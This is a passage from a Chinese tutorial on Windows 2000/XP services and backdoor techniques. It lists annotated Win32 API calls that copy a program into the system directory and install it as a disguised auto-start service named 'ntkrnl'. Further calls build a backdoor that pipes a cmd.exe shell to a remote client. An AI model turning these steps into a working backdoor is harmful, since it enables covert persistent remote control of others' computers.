浅析Windows 2000/XP服务与后门技术(3) //查找系统目录下服务程序的文件是否已经存在; GetModuleFileName(NULL,lpCurrentPath,MAX_PATH); //获得当前进程的程序文件名; CopyFile(lpCurrentPath,lpImagePath,FALSE); //复制文件到系统目录下; schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS); //打开服务控制管理器数据库; CreateService(schSCManager,"ntkrnl","ntkrnl", SERVICE_ALL_ACCESS,SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, "ntkrnl.exe",NULL,NULL,NULL,NULL,NULL); //创建服务,参数包括名称,服务类型,开始类型,错误类型及文件路径等; schService=OpenService(schSCManager,"ntkrnl",SERVICE_START); //如果服务已经创建,则打开服务; StartService(schService,0,NULL); //启动服务进程; ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus); //控制服务状态; DeleteService(schService); //卸载服务程序; DeleteFile(lpImagePath); //删除文件;
3.后门程序相关函数
hMutex=CreateMutex(NULL,FALSE,NULL); //创建互斥量; hThread=CreateThread(NULL,0,CmdShell,(LPVOID)&sClient,0,NULL); //创建处理客户端访问的重定向输入输出线程; CreatePipe(&hReadPipe,&hReadShell,&saPipe,0); CreatePipe(&hWriteShell,&hWritePipe,&saPipe,0); //创建用于进程间通信的输入/输出管道; CreateProcess(lpImagePath,NULL,NULL,NULL,TRUE,0,NULL,NULL,&lpStartupInfo,&lpProcessInfo); //创建经重定向输入输出的Cmd进程; hThread[1]=CreateThread(NULL,0,ReadShell,(LPVOID*)&sdRead,0,&dwSendThreadId); hThread[2]=CreateThread(NULL,0,WriteShell,(LPVOID *)&sdWrite,0,&dwReavThreadId); //创建处理Cmd输入输出的线程; dwResult=WaitForMultipleObjects(3,hThread,FALSE,INFINITE); //等待线程或进程的结束; ReleaseMutex(hMutex); //释放互斥量; PeekNamedPipe(sdRead.hPipe,szBuffer,BUFFER_SIZE,&dwBufferRead,NULL,NULL); //从管道中复制数据到缓冲区中,但不从管道中移出; ReadFile(sdRead.hPipe,szBuffer,BUFFER_SIZE,&dwBufferRead,NULL); //从管道中复制数据到缓冲区中; WriteFile(sdWrite.hPipe,szBuffer2Write,dwBuffer2Write,&dwBufferWritten,NULL); //向管道中写入从客户端接收到的数据;